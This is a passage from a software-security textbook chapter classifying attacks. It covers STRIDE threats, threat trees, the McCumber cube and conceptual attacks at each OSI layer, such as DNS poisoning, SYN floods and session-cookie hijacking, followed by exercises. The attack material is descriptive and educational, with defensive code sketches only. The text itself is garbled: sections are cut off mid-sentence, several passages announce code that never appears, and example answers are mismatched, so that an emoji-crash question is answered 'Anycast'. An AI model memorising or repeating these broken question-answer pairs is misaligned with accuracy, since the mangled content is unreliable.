Spoofing
Spoofing identity is pretending to be someone other than who you really are, such
as by getting access to someone else’s passwords and then using them to access
data as if the attacker were that person. Spoofing attacks frequently lead to other
types of attack. Examples include:
• Masking a real IP address so another can gain access to something that
otherwise would have been restricted.
• Writing a program to mimic a login screen for the purpose of capturing
authentication information.
Denial of Service
Denial of Service (D.o.S.) is another common type of attack, involving making a
service unavailable to legitimate users. D.o.S. attacks can target a wide variety of
services, including computational resources, data, communication channels,
time, or even the user’s attention. Many organizations, including national
governments, have been victims of denial of service attacks. Examples include:
• Getting a large number of people to show up in a school building so that
classes cannot be held.
• Interrupting the power supply to an electrical device so it cannot be used.
• Sending a web server an overwhelming number of requests, thereby
consuming all the server’s CPU cycles. This makes it incapable of responding
to legitimate user requests.
• Changing an authorized user’s account credentials so they no longer have
access to the system.
Elevation of Privilege
Elevation of privilege can lead to almost any other type of attack, and involves
finding a way to do things that are normally prohibited. In each case, the user is
not pretending to be someone else. Instead, the user is able to achieve greater
privilege than he normally would have under his current identity. Examples
include:
• A buffer overrun attack, which allows an unprivileged application to execute
arbitrary code, granting much greater access than was intended.
• A user with limited privileges modifies her account to add more privileges,
thereby allowing her to use an application that requires those privileges.
In most cases, a single attack can yield other attacks. For example, an attacker
able to elevate his privilege to an administrator can normally go on to delete the
logs associated with the attack. This yields the threat tree shown in Figure 02.2.
In this scenario, an elevation of privilege attack can also lead to a repudiation
attack. Figure 02.2 is a graphical way to represent this relation. There are many
reasons why threat trees are important and useful tools. First, we can easily see
the root attack that is the source of the problem. Second, we can see all the
attacks that are likely to follow if the root attack is successful. This is important
because often the root attack is not the most severe attack in the tree. Finally,
the threat tree gives us a good idea of the path the attacker will follow to get to
the high value assets.
[Figure 02.2: Simple attack tree]
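A threat tree is naturally a recursive structure, and representing it in code makes the “attacks that follow the root” property easy to compute. The node names below mirror the elevation-of-privilege example; the class itself is my own sketch, not an API from the text.

```python
class ThreatNode:
    """One attack in a threat tree; children are attacks it enables."""

    def __init__(self, attack, children=None):
        self.attack = attack
        self.children = children or []

    def downstream(self):
        """All attacks that become possible once this node succeeds."""
        result = []
        for child in self.children:
            result.append(child.attack)
            result.extend(child.downstream())
        return result

root = ThreatNode("elevation of privilege",
                  [ThreatNode("repudiation (delete logs)")])
```

Walking `root.downstream()` lists every follow-on attack, which is useful when deciding whether the root really is the most severe node in the tree.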
In many situations, the threat tree can involve several stages and be quite
involved. Consider, for example, an attacker who notices that unintended
information is made available on an e-commerce site. From this disclosure, the
attacker is able to impersonate a normal customer. With this minimal amount of
privilege, the attacker pokes around and finds a way to change the user’s role to
administrator. Once in this state, the attacker can wipe the logs, create a new
account for himself so he can re-enter the system at will, sell confidential
information to the highest bidder, and shut down the site at will. The complete
threat tree for this scenario is shown in Figure 02.3.
One final thought about threat trees: it is tempting to address only the root
problem, believing that the entire attack will be mitigated if the first step is
blocked. This approach is problematic. If the attacker is able to find another way
to get to the head of the threat tree through a previously unknown attack vector,
then the entire threat tree can be realized. It is far safer to attempt to address
every step of the tree. This principle is called “defense in depth.”
[Figure 02.3: Somewhat complex attack tree]
Information States
The second dimension of the McCumber Cube is the state in which information
assets may reside. Though most problems focus on one or two states, it is not
uncommon for a problem to span all three states.
Storage
This is also called “data at rest.” Examples include data on a hard disk, data in
memory, or even data in a register. Any data that is not currently being used or
moved is considered storage. Back to our banking example, this would include
money in an account or valuables in a safety deposit box.
The vast majority of the world’s data is in storage at any moment in time. Though
storage data is certainly the easiest to protect, it often holds an organization’s most
valuable assets. Therefore, storage strategies must be carefully chosen.
Transmission
Transmission is data being moved from one location to another. Network security
is primarily concerned with this data state. This may include data moving along a
wire or transmitted through Wi-Fi. This brings up the question: is a CD sent through
the post in the storage or transmission state? In our banking example, this would
include money in an armored car moving assets to another bank or even account
information being transmitted to an ATM.
Processing
The processing state of data occurs when data is currently being used. Processing
of money in a bank might include a teller counting money during a deposit or an
interest calculation function changing an account balance.
Most vulnerabilities occur when data is being processed. This is when code is
operating on data, transforming it from one state to another. If an attacker can
trick the system into performing unintended processing or making a mistake in
processing, then a processing attack may be possible.
Copper Wire Information is passed through electron transfer in the form of electrical current.
This is typically accomplished through voltage or current variations. Data transfer
is point-to-point: from the location where the electrons are placed on the wire,
down the wire itself, to the location where electrons are measured. Copper wire
has two properties making it vulnerable to attack: it is easy to splice (thereby
making confidentiality assurances difficult) and to cut (making availability
assurances difficult). Common uses are CAT-5 cable and coaxial cable.
Fiber Optic Cable Information is passed through photon transfer in the form of light pulses. The
medium is glass and signals are passed through the glass with different
frequencies of light. Data transfer is point-to-point; it is difficult to splice but easy
to cut.
Electromagnetic Information is passed through air using photon transfer in the form of EM waves
(EM) waves at specific frequencies. Data transfer starts at the transmitter and many receivers
may listen; it is easy to “splice” (because the signal can be viewed by many
observers simultaneously) and “cutting” can occur through jamming. Common
frequencies include: 450, 950, 1800, and 2100 MHz for cellular networks, 2400-
2480 MHz for Bluetooth, 2.4, 3.6, and 5 GHz for Wi-Fi.
The physical layer is the lowest OSI layer. It provides a medium on which data link
connections are made. Note that software engineers rarely concern themselves
with the physical layer; electrical engineers work at this layer.
Confidentiality
Disclosure attacks on the physical layer occur when the attacker obtains access
to a signal which the defender of the network did not anticipate. If the defender
relied on physical security, then the entire network could be compromised when
the attacker achieves physical access.
In the 1990’s the NSA discovered an undersea cable connecting a Russian
submarine base with the mainland. Because the cable was so inaccessible, the
NSA theorized, there would probably not be many other security mechanisms on
the network. In conjunction with the U.S. Navy, the cable was found and a
listening device was attached to it by a specially modified submarine. For several
years, this submarine periodically re-visited the cable to retrieve data captured by
the recording device. Eventually the cable was damaged in a storm and, when it
was repaired, the listening device was discovered. Ownership of the device was
easy to ascertain because a label was printed on the inside cover: “Property of the
CIA.”
Another example occurred by utilizing the availability of wireless signals far
outside their intended range:
In a Lowe’s home-improvement store in 2003, an employee of the store set up a
small Wi-Fi network whose range did not extend beyond the perimeter of the
store. Due to this presumably secure physical layer, minimum security was placed
on the network. Adam Botbyl and Brian Salcedo, however, discovered the
unprotected network and decided to launch an attack. Operating in a Pontiac
Grand Prix in the store’s parking lot, they extended the physical extent of the
network with a home-made antenna. From this entry point, they quickly defeated
the minimal security measures and began stealing credit card data from the
store’s customers.
Finally, some thieves are able to trick customers into revealing their credit card
number:
A skimmer is a device placed on an ATM or a credit card reader that records the
swipe information from a victim’s card. If the victim does not notice the presence
of the skimmer, the victim’s card data will be recorded while a valid purchase is
made.
[Figure 02.4: ATM skimmer. Reproduced with permission from Aurora Police
Department]
Integrity
Alteration attacks on the physical layer are rare because the attacker needs to be
able to selectively change the composition of a network signal. Typically, integrity
attacks occur at the data link, transport, and presentation layers.
Availability
There are three forms of denial attacks on the physical layer: blocking a signal,
saturating a signal, and stealing access to a network.
Block The simplest example of a blocking denial attack on the physical layer is to cut
a fiber optic, coaxial, or CAT-5 cable. This can occur any time the attacker has
physical access to the wired component of a network. Other examples of
blocking attacks include removing, damaging, or denying power to network
hardware. Stealing a Wi-Fi router would be an example of a blocking attack.
Saturating Saturation network attacks occur when the attacker floods the physical layer
with bogus signals. This is commonly known as jamming. An attacker can jam a
Wi-Fi network by broadcasting large amounts of EM energy at the 2.4, 3.6, and
5 GHz frequencies. Another jamming attack occurs when a collection of rogue
Wi-Fi access points is set up in the midst of an authentic wireless network. When
all the frequencies are consumed by rogue signals, it becomes difficult for
legitimate users to access the network.
Stealing Access A final denial attack of the physical layer occurs when the attacker attempts to
get unauthorized access to network resources. For Wi-Fi networks, this process
is commonly called wardriving. Wardriving is the process of driving through
neighborhoods and local business districts looking for open wireless networks.
This typically involves little more than a laptop, a hand-made antenna, and
some readily available software.
Availability
A denial attack can occur on a network where a fixed number of ports or channels
are available. A rogue access point could claim all ports or channels thereby
denying legitimate traffic from getting on the network. This could occur even if
there is plenty of bandwidth still available on the network.
Integrity
Alteration attacks on the network layer occur when an IP header is modified or
when IP processes can be altered. Examples of alteration attacks include:
Food Fight The destination address of a packet is changed to match the source address.
When the recipient replies to the packet, a message will be sent back to itself
rather than to the originator of the packet.
Redirection A message is sent to an innocent bystander with the source address faked and
the destination directed to the intended victim. The bystander will then send
messages to the victim from the bystander without any evidence of the
attacker’s role.
DNS Poisoning The Domain Name System (DNS) is a network service translating URLs (e.g.
www.byui.edu) to IP addresses (e.g. 157.201.130.3). If the DNS mappings
between URLs and IP addresses can be altered, then message routing will not
occur as the network designer intends.
Attempts are made to address these and other integrity attacks in IPv6 and IPsec.
This is accomplished with signing and integrity checks on IP headers.
Availability
Nearly all availability network attacks occur at the Domain Name System (DNS).
The DNS is a network device that translates URLs to IP addresses. For example, it
would convert www.byui.edu to 157.201.130.3. An analogy in the physical world
would be the map in a post office indicating the city corresponding to a given zip
code. This is an essential part of the Internet architecture: how else can a packet
find its way to the destination? The most common denial attacks on the DNS
include DNS flood, DNS DoS, and DNS crash. Other denial attacks on the network
layer focus on the ability of network routers to correctly direct packets.
DNS Flood A DNS flood is an attack on the DNS servers by inundating (or flooding) them
with pointless requests. As the DNS servers respond to these requests, they
become too busy to respond to valid DNS requests. As a result, routers are
unable to send packets in the direction of their destination.
DNS DoS A DNS DoS attack is an attack on the DNS server itself, rendering it incapable of
responding to valid DNS requests. Common DNS DoS attacks include attacking
the server’s implementation of the TCP/IP stack, forcing it to handle requests
less efficiently, or tricking the server into consuming some other vital system
resource.
DNS Crash A DNS crash attack is an attack on the system hosting the DNS, causing it or some
vital service to shut down. This can be accomplished by exploiting vulnerabilities
in the system hosting the DNS, exploiting vulnerabilities in the DNS resolution
software itself, or physically attacking the DNS servers. DNS crash attacks are
rare because DNS servers have been rigorously analyzed and are considered
hardened against such attacks.
Host Resolution This attack prevents a router from connecting to a DNS and thereby
compromises its ability to route packets. This can be accomplished by removing
DNS request packets from the network or by altering DNS results.
Smurf A Smurf attack is a network attack where two hosts are tricked into engaging in
a pointless high-bandwidth conversation. This occurs when an attacker sends a
ping request to a target with the return address being an innocent 3rd party. As
the target responds to the 3rd party, the 3rd party responds with a ping of its
own. This back-and-forth continues until the channels between the target and
the 3rd party are saturated. The result of a Smurf attack is that all traffic routed
through these connections is blocked.
Modern routers and DNS servers are largely hardened against these and other denial attacks.
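The name-to-address translation that these attacks target can be demonstrated with the standard socket library. The lookup below resolves locally, so no network round trip is assumed; a lookup of a real domain such as www.byui.edu would query a resolver.

```python
import socket

def resolve(hostname: str) -> str:
    """Translate a hostname to a single IPv4 address string."""
    # gethostbyname performs the same URL-to-address mapping that
    # DNS flood, DoS, and crash attacks aim to disrupt.
    return socket.gethostbyname(hostname)

address = resolve("localhost")   # typically "127.0.0.1"
```

When the resolver is unreachable (the goal of the denial attacks above), this call raises `socket.gaierror`, and the application cannot direct packets to their destination.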
forged sequence number, the imposter can insert his datagram into the message
without being detected. This attack has been mitigated by RFC 1948, which
describes how to generate sequence numbers that are difficult to predict.
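The idea behind RFC 1948 can be sketched briefly: derive each connection’s initial sequence number from a hash of the connection identifiers and a per-host secret, then add a clock component so numbers still advance over time. The secret and tick rate below are illustrative, not values from the RFC.

```python
import hashlib
import time

SECRET = b"per-host-secret"   # assumed placeholder; kept private by the host

def initial_sequence_number(src_ip: str, src_port: int,
                            dst_ip: str, dst_port: int) -> int:
    """Hard-to-predict 32-bit ISN in the spirit of RFC 1948."""
    ident = f"{src_ip}:{src_port}-{dst_ip}:{dst_port}".encode()
    digest = hashlib.md5(SECRET + ident).digest()
    offset = int.from_bytes(digest[:4], "big")   # per-connection offset
    clock = int(time.monotonic() * 250_000)      # 4-microsecond tick
    return (clock + offset) % 2**32
```

Because the offset depends on the secret, an off-path attacker who observes one connection’s sequence numbers still cannot predict another connection’s, which is what defeats the forged-datagram insertion described above.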
Availability
Denial attacks target the way that messages are created from individual packets.
There are two broad categories of attacks: creating a sequence of packets in such
a way that the receiver will have difficulty reconstructing them, or hijacking a
conversation. The first category of attacks can be implemented in a wide variety
of ways, including incomplete connections and reconstruction. The second
category involves a rogue network node manipulating packets that pass between
the source and destination points. Note that just removing these packets does
not guarantee a denial attack; the packets will simply be re-sent on a different
path. Denial attacks at the transport layer consist of altering the TCP component
of the packets in such a way that the destination becomes satisfied that the entire
message has arrived. Two examples of such attacks are the TCP Reset attack and
the Stream Redirect attack.
Incomplete Connection Opening a TCP connection but not completing the 3-way handshake can leave
the recipient with a partially opened connection. If this is done enough times,
then the recipient will lose the capability to begin a normal connection. Another
name for this is a “SYN Flood attack” because the 3-way handshake is initiated
with a session setup packet with the SYN field set.
Reconstruction Sending packets with overlapping reference frames or with gaps, making it
impossible for the recipient to reconstruct the message. This is commonly called
a “teardrop” attack.
TCP Reset Attack A rogue network node modifies a packet from the source so that the Reset
command is set. This command serves to terminate the message and denies the
recipient the intended message. This attack can also occur if the rogue
network node is able to predict the next sequence number in a packet stream.
Stream Redirect The TCP connection between two points is corrupted by sending misleading
SEQ/ACK signals. The attacker then mimics the source’s connection state and
assumes the source’s end of the conversation. Once this is accomplished, the
attacker can terminate the conversation with the destination.
(multiple interactions with the server governed by a single login). The latter is
accomplished with the cookie mechanism.
Cookies are a mechanism built into web browsers in 1994 by Mosaic Netscape for
the purpose of enabling session information to pass between the client and the
server. The term “cookie” dates to 1987, when a collection of session keys was
kept in a “cookie jar.” A cookie is defined as:
A token or packet of data that is passed between computers or programs to allow
access or to activate certain features; (in recent use spec.) a packet of data sent
by an Internet server to a browser, which is returned by the browser each time it
subsequently accesses the same server, thereby identifying the user or monitoring
his or her access to the server.
(Oxford English Dictionary, 2012)
Cookies consist of three components: name, value, and domain. However, it is not
uncommon for other attributes to be attached. Servers can send a cookie to a
client, which the client may choose to accept. If the client accepts the cookie, then
subsequent requests to the server will include the cookie information. This allows
the server to keep track of conversations involving multiple messages.
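The round trip can be sketched with Python’s standard `http.cookies` module: the server emits a `Set-Cookie` header, and the client parses it and echoes the cookie back on later requests. The name, value, and domain below are illustrative.

```python
from http.cookies import SimpleCookie

# Server side: build the Set-Cookie header with the three components
# named in the text (name, value, domain).
server = SimpleCookie()
server["session"] = "a1b2c3"
server["session"]["domain"] = "example.com"
header = server.output()   # e.g. "Set-Cookie: session=a1b2c3; Domain=example.com"

# Client side: parse the header; the client would now attach this
# cookie to every subsequent request to the same server.
client = SimpleCookie()
client.load(header.replace("Set-Cookie:", "").strip())
```

The server recognizes the returned `session` value on later requests, which is how one login governs a conversation of many messages.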
Confidentiality
A disclosure attack on the session layer involves an eavesdropper being able to
recognize that the individual messages sent between the client and the server are
part of a larger conversation. This information can be ascertained by the
eavesdropper if a cookie is detected. Note, however, that not all cookies are used
to maintain session state.
Another example of a disclosure attack is called session hijacking. In this case, an
eavesdropper is able to inject himself into the conversation and read private
communications.
Integrity
An integrity attack on the session layer involves an eavesdropper being able to
modify a conversation between a client and a server. This is typically
accomplished by the attacker injecting messages in the conversation without the
recipient being aware of the forgery. This process is called Session Hijacking,
Cookie Theft, Cookie Poisoning, or SideJacking. SideJacking is the process of an
eavesdropper capturing or guessing a session cookie being passed between a
client and a server. With this cookie, the eavesdropper can send a new request
to the server and the server will believe the request came from the authenticated
client.
The eavesdropper can often guess a cookie if the server does not use a strong
random number to represent session state. If, for example, the server uses a
simple counter (every subsequent session has a value one greater than the
preceding session), then the attacker can guess the cookie by obtaining a valid
cookie and generating requests with higher values. Another example would be a
cookie being a random 8-bit number. With at most 256 guesses, the attacker will
be able to correctly guess any session cookie and thereby hijack the session. Both
of these attacks can be avoided if the server uses a sufficiently large and random
number to represent session state.
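The difference between a guessable and an unguessable session identifier can be sketched as follows. This is an illustrative sketch, not production code: the function names are invented, and a real server should draw tokens from an operating-system CSPRNG rather than std::random_device, whose quality is implementation-defined.

```cpp
#include <cstdint>
#include <random>
#include <sstream>
#include <string>

// Weak: each session ID is one greater than the last. An attacker who
// observes one valid cookie can simply enumerate neighboring sessions.
std::string nextSequentialToken()
{
   static uint64_t counter = 1000;
   return std::to_string(counter++);
}

// Stronger: 128 bits drawn from a non-deterministic source. The attacker
// must now guess among 2^128 values rather than "last value + 1".
std::string nextRandomToken()
{
   std::random_device rd;     // entropy source; quality is platform-dependent
   std::ostringstream out;
   out << std::hex
       << ((uint64_t(rd()) << 32) | rd())
       << ((uint64_t(rd()) << 32) | rd());
   return out.str();
}
```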
Availability
An availability attack on the session layer involves making it difficult for the client
and the server to maintain a conversation. This can occur if the attacker is able to
interrupt the cookie exchange process, destroy the user’s cookie, or make the
server unable to recognize the client’s cookie.
Security for Software Engineers | Unit 1: Attack Vectors | Chapter 02: Classification of Attacks | 37
OSI Layer 7 - Application
The application layer is the originator of network messages and the ultimate
consumer of messages. It is defined as:
[The] highest layer in the OSI Architecture. Protocols of this layer directly serve the
end user by providing the distributed information service appropriate to an
application, to its management, and to system management.
(Zimmerman, OSI Reference Model, 1980)
An application-layer attack occurs when an attacker targets the recipient of a
network communication. This recipient could, of course, be either the client or
the server. Examples of programs that may be targets of application-layer attacks
are: web browsers, e-mail servers, networked video games, and mobile social
applications. Virtually any program can be the target of an application-layer
attack. Because of this diversity, discussion will be focused on areas common to
most applications: denial attacks.
Application Crash
An application crash DoS attack is any attack where a maliciously formed input
can cause the recipient to terminate unexpectedly. There are two underlying
sources of crash vulnerabilities: a previously unseen defect which the testing
team should have found, or an incorrect assumption about the format of the
incoming data. The former source is not a security issue per se, but rather a
quality issue. Robust software engineering practices can mitigate this type of
attack. This cannot be said about the second source: incorrect assumptions.
Most software engineers design file and network interfaces with the
assumption that data will come in the expected format. While error checking
may be built into the process, import code is optimized for the common case
(well-formed data) rather than the worst case. Attackers do not honor this
assumption. They strive to crash the application by creating input designed to
exercise the worst-case scenario.
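The incorrect-assumption failure mode can be sketched with a hypothetical length-prefixed message format: one length byte followed by that many payload bytes. The format and the function name are invented for illustration; the point is that the length field is validated before it is trusted.

```cpp
#include <cstddef>
#include <cstdint>
#include <vector>

// Message format (hypothetical): [1-byte payload length][payload bytes].
// Returns the payload, or an empty vector if the message is malformed.
std::vector<uint8_t> parseMessage(const uint8_t* data, size_t size)
{
   if (size < 1)
      return {};                 // no room for the length byte
   size_t claimed = data[0];
   if (claimed > size - 1)
      return {};                 // attacker claims more bytes than were sent
   return std::vector<uint8_t>(data + 1, data + 1 + claimed);
}
```

A parser that skipped the `claimed > size - 1` check would read past the end of the buffer whenever an attacker claims more bytes than were actually sent, a classic crash (or disclosure) input.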
CPU Starvation
A CPU Starvation attack occurs when the attacker tricks a program into
performing an expensive operation consuming many CPU cycles. Some
algorithms, like sorting or parsing algorithms, can make an application
vulnerable to this kind of DoS attack. CPU Starvation attacks typically occur
when the developer optimizes on the common case rather than the worst case.
Attackers leverage this mistake by creating pathologically complex input
designed to exercise this worst case. As the server responds to this input, it
becomes difficult to respond to legitimate input from the user.
One CPU Starvation mitigation strategy is to avoid designing protocols that are
cheap for the attacker to produce but expensive for the recipient to consume.
Network protocols and file formats should be designed with size, ease of
creation, and ease of consumption in mind. If the latter is not taken into
account, opportunities exist for CPU Starvation attacks. One disclaimer: often
software engineers are not given the luxury of specifying communication
protocols.
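One classic instance of this mistake is a quicksort that always pivots on the first element: random input costs roughly n log n comparisons, while already-sorted input, which is trivially cheap for an attacker to generate, degrades to n(n-1)/2. The sketch below counts comparisons to make the blowup visible; it is an illustration, not an example taken from the text.

```cpp
#include <cstddef>
#include <utility>
#include <vector>

// Quicksort with a naive first-element pivot; counts comparisons so the
// worst-case blowup is measurable. Sorted input is the pathological case.
static size_t comparisons = 0;

void quicksort(std::vector<int>& a, int lo, int hi)
{
   if (lo >= hi)
      return;
   int pivot = a[lo];
   int i = lo;
   for (int j = lo + 1; j <= hi; j++)
   {
      comparisons++;
      if (a[j] < pivot)
         std::swap(a[++i], a[j]);
   }
   std::swap(a[lo], a[i]);
   quicksort(a, lo, i - 1);     // on sorted input this side is always empty
   quicksort(a, i + 1, hi);
}
```

Production sorts such as std::sort use better pivot selection and introsort precisely to bound this worst case.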
Memory Starvation
Memory starvation occurs when the demands on the memory allocator degrade
performance or cause a program to malfunction. The attacker simply needs to
trick the program into fragmenting memory (for example, through many
successive new/delete operations) or into consuming all available memory.
Memory starvation attacks can be difficult to mitigate
because it is difficult to tell exactly how memory usage patterns are tied to
network input. However, the following guidelines are generally applicable:
Avoid dynamic memory allocation. Stack memory is guaranteed not to
fragment. Heap memory management is much more complex and difficult to
predict. Fragmentation is a leading cause of memory starvation.
Use the minimal amount of memory. Though it is often convenient to reserve
the maximal amount of memory available, this can lead to memory starvation
attacks.
Consider writing a custom memory management system. Generic memory
management systems built into the operating system and most compilers do
not leverage insider knowledge about how a given application works. If, for
example, it is known that all memory allocations are 4k, a custom memory
manager can be made much more efficient than one designed to handle
arbitrary sizes. See Appendix F: The Heap for details as to how this can be done.
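The fixed-size idea above can be sketched as a small free-list pool. This is an illustrative sketch, not the allocator from Appendix F: one slab is reserved up front, and because every block is the same size, freed blocks are reused in O(1) with no fragmentation.

```cpp
#include <cstddef>
#include <vector>

// A pool handing out fixed-size blocks from one preallocated slab.
// All blocks are the same size, so freed blocks can simply be threaded
// onto a free list and handed out again.
class FixedPool
{
public:
   FixedPool(size_t blockSize, size_t blockCount)
      : slab(blockSize * blockCount)
   {
      for (size_t i = 0; i < blockCount; i++)
         freeList.push_back(&slab[i * blockSize]);
   }

   void* allocate()
   {
      if (freeList.empty())
         return nullptr;              // pool exhausted: fail fast, do not grow
      void* block = freeList.back();
      freeList.pop_back();
      return block;
   }

   void release(void* block)
   {
      freeList.push_back(static_cast<char*>(block));
   }

private:
   std::vector<char>  slab;           // one up-front allocation
   std::vector<char*> freeList;       // blocks currently available
};
```

Failing fast on exhaustion, rather than growing without bound, also caps the damage an attacker can do by flooding the program with allocation-triggering input.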
Examples
1. Q Is it possible to have an attack without a threat?
3. Q What reasons might exist why there might be a risk but no attack?
4. Q What are the similarities and differences between denial of service and
information disclosure?
A From the C.I.A. triad, denial of service is a loss of availability while information
disclosure is a loss of confidentiality. They represent completely different
assurances.
5. Q Identify the threat category for the following: A virus deletes all the files on a
computer.
A Denial of Service because the user of the files no longer has access to them.
6. Q Identify the threat category for the following: A student notices her Professor’s
computer is not locked so she changes her grade to an 'A'.
A Tampering because the correct grade has been changed contrary to the user’s
wish.
7. Q Identify the threat category for the following: The first day of class, a student
walks into the classroom and impersonates the professor.
8. Q A certain user is conducting some online banking from her smart phone using
an app provided by her bank. Classify the following attack according to the three
dimensions of the McCumber cube: An attacker intercepts the password as it is
passed over the Internet and then impersonates the user.
9. Q A certain user is conducting some online banking from her smart phone using
an app provided by her bank. Classify the following attack according to the three
dimensions of the McCumber cube: An attacker convinces the user to allow him
to touch the phone. When he touches it, he breaks it.
A - Type: Availability; the phone can no longer be used by the intended user.
  - State: Storage; at the time of the attack, all the data is at rest.
  - Protection: Policy; the user should, by policy, not let strangers touch her
    phone.
10. Q A certain user is a spy trying to send top secret information back to
headquarters. Can you list attacks on this scenario involving all the components
of the McCumber cube?
A - Confidentiality: the attacker can learn the message and send it to the
    police.
  - Integrity: the attacker can intercept the message and insert misleading
    intelligence.
  - Availability: the attacker can block the message by destroying the spy’s
    communication equipment.
  - Storage: the attacker can find the message in the spy’s notebook and
    disclose it to the police.
  - Transmission: the attacker can intercept the message as it is being sent
    and alter it in some way.
  - Processing: the attacker can disrupt the ability of the spy to encrypt the
    message by distracting him.
  - Technology: the attacker can find the transmission machine and destroy
    it.
  - Policy: the attacker can learn the protocol for meeting other spies and
    impersonate a friend.
  - Training: the attacker can get the spy drunk, thereby making him less able
    to defend himself.
11. Q Consider a waitress. She is serving several tables at the same time in a busy
European restaurant. For each O.S.I. layer, 1) describe how the waitress uses
the layer and 2) describe an attack against that layer.
12. Q Consider the following scenario: A boy texting a girl in an attempt to get a date.
Identify the O.S.I. layer being targeted: A large transmitter antenna is placed
near the boy’s phone broadcasting on the cellular frequency.
A Physical because the medium in which the cell phone communicates with the
cellular tower is saturated.
13. Q Consider the following scenario: A boy texting a girl in an attempt to get a date.
Identify the O.S.I. layer being targeted: The girl’s friend steals his phone and
interjects comments into the conversation.
14. Q Consider the following scenario: A boy texting a girl in an attempt to get a date.
Identify the O.S.I. layer being targeted: The boy sends an emoji (emotional icon
such as the smiley face) to the girl but her phone cannot handle it. Her phone
crashes.
A Anycast. People randomly talk to their nearest neighbor who then passes it on.
17. Q Classify the following as Broadcast, Anycast, Multicast, or Unicast: I walk into
class and would like a student to explain the solution to a homework
assignment. I start by asking if anyone feels like explaining it. Then I walk over
and have a short conversation with the volunteer.
18. Q Classify the following as Broadcast, Anycast, Multicast, or Unicast: A boy walks
into a party and notices a pretty girl. He walks directly to her and they talk
throughout the night. They talk so much, in fact, that they do not notice anyone
else.
19. Q Consider the telephone system before there were phone numbers (1890-1920).
Here you need to talk to an operator to make a call. In this scenario a grandchild
is going to tell her grandma how her basketball game went. For each O.S.I. layer,
describe how the telephone implements the layer.
Exercises
1 From memory, please define the following terms: asset, threat, vulnerability,
risk, attack, mitigation.
5 What are the similarities and differences between tampering and repudiation?
6 What are the similarities and differences between spoofing and elevation of
privilege?
7 Identify the threat category for each of the following. Do this according to the
state of the asset (including the O.S.I. layer if the asset is in transmission), type
of assurance the asset offers (using S.T.R.I.D.E.), and the type of vulnerability
necessary for an attack to be carried out:
- A program wipes the logs of any evidence of its presence.
- SPAM botnet software consumes bandwidth and CPU cycles.
- Malware turns off your virus scanner software.
- A telemarketer calls you at dinner time.
- After having broken into my teacher’s office, I wiped my fingerprints from
  all the surfaces.
- I was unprepared for the in-lab test today so I disabled all the machines in
  the Linux lab with a hammer.
- I have obtained the grader’s password and have logged in as him.
- I changed the file permissions on the professor’s answer key so anyone can
  view the contents.
- I have intercepted the packets leaving my teacher’s computer and altered
  them to reflect the grade I wish I had earned.
- The teacher left himself logged in on E-Learn so I changed my role from
  “student” to “grader”.
10 A certain user keeps his financial data in an Intuit Quicken file on his desktop
computer at home. For each of the following problems, classify them according
to the three dimensions of the McCumber cube:
- An attacker standing outside the house shoots the computer in the hard
  drive.
- An attacker tricks the software into accepting a patch which sends passwords
  to his server.
- An attacker breaks into the house and installs a camera in the corner of the
  office, capturing pictures of the balance sheet to be posted on the Internet.
- An attacker intercepts messages from the user’s bank and changes them so
  the resulting balance will not be accurate.
- An attacker convinces a member of the household to delete the file.
- An attacker places spyware on the computer which intercepts the file
  password as it is being typed.
12 From memory, list and define each of the O.S.I. layers. What service does each
layer provide?
13 Consider the following scenario: an author and a publisher are collaborating on
a cookbook through the conventional mail. Unfortunately, an attacker is intent
on preventing this from happening. For each of the following attacks, identify
which O.S.I. layer is being targeted.
- Have more than one post office report as representing a given zip code.
- Introduce a rogue editor replacing the role of the real editor, yielding
  inappropriate or misleading instructions for the author.
- Remove the mailbox so the mailman cannot deliver a message.
- Change the sequence of messages so that the reconstructed book will
  appear differently than intended.
- Inject a rogue update into the conversation yielding an unintended addition
  to the book.
- Translate the message from English to French, a language the recipient
  cannot understand.
- Change or obscure the destination address on the envelope.
- Immerse the mailbag in water to deny the recipients their data.
- Terminate the conversation before it is completed.
- Alter the instructions so the resulting meal is not tasty to eat.
- Adjust the address on an envelope while it is en route.
- Fill the mailbox so there is no room for incoming mail.
- Harm the user of the book by adding instructions to combine water and
  boiling oil.
- Remove the stamp on a letter so the mailman will return the message.
- Remove one or more messages, thereby making it impossible to reconstruct
  the completed work.
14 Consider a coach of a high school track team. Due to weather conditions, the
coach needs to tell all the runners that the location of practice will be moved.
He has several routing options at his disposal. For each routing option, describe
how it would work in this scenario and describe an attack.
- Broadcast
- Anycast
- Multicast
- Unicast
Problems
1 Consider the telegraph (you might need to do some research to see how this
works). In 1864, the Nevada Constitution was created and telegraphed to the
United States Congress so Nevada could be made a state before the upcoming
presidential election. For each O.S.I. layer:
1. Describe how the telegraph implements the layer.
2. Describe an attack against that layer.
3. Describe how one might defend against the above attack.
2 Consider the telephone system before there were phone numbers (you might
need to do some research to see how this works). Here you need to talk to an
operator to make a call. For each O.S.I. layer:
1. Describe how the telephone implements the layer.
2. Describe an attack against that layer.
3. Describe how one might defend against the above attack.
3 Consider the SMS protocol for texting (you might need to do some research to
see how this works). Here you are having a conversation with a classmate on
how to complete a group homework assignment. For each O.S.I. layer:
1. Describe how texting implements the layer.
2. Describe an attack against that layer.
3. Describe how one might defend against the above attack.
8 While it is clearly illegal to steal a physical asset that resides inside another’s
residence, is it also illegal to take an asset if the taking causes the victim no
harm (in fact, if he doesn’t notice) and if that asset extends into public
property? Clearly, there is nothing wrong with sitting outside a bread store and
“stealing” the aroma of fresh bread. Is stealing wireless wrong?
Chapter 03: Software Weapons
“What is the worst thing that could happen from this vulnerability?” This chapter is designed to answer
that question. Reciting and defining the various software weapons is less important than recognizing the
damage that could result if proper security precautions are not taken.
The vast majority of attacks follow well-established patterns or tools. These tools
are commonly called malware: software designed to carry out a malicious intent.
Though the term “malware” (for “MALicious software”) has taken hold in our
modern vernacular, the term “software weapon” is more descriptive, because
software weapons are wielded and used in a way similar to how a criminal would
use a knife or a gun.
While it is unknown when it was first conceptualized that software could be used
for a destructive or malicious intent, a few events had an important influence.
The first is the publication of Softwar, La Guerre Douce by Thierry Breton and
Denis Beneich. This book depicts...
... a chilling yarn about the purchase by the Soviet Union of an American
supercomputer. Instead of blocking the sale, American authorities, displaying
studied reluctance, agree to the transaction. The computer has been secretly
programmed with a “software bomb” ... [which] proceeds to subvert and destroy
every piece of software it can find in the Soviet network. (Softwar, La Guerre Douce, 1984)
Software weapons exploit vulnerabilities in computing systems in an automated
way. In other words, the author discovers a vulnerability in a target system and
then writes the malware to exploit it. If the vulnerability were fixed, the software
weapon would not be able to function the way it was designed. It is therefore
instructive to study software weapons in an effort to better understand the
ramifications of unchecked vulnerabilities.
A software engineer needs to know about software weapons because these are
the tools black hats use to compromise a legitimate user’s confidentiality,
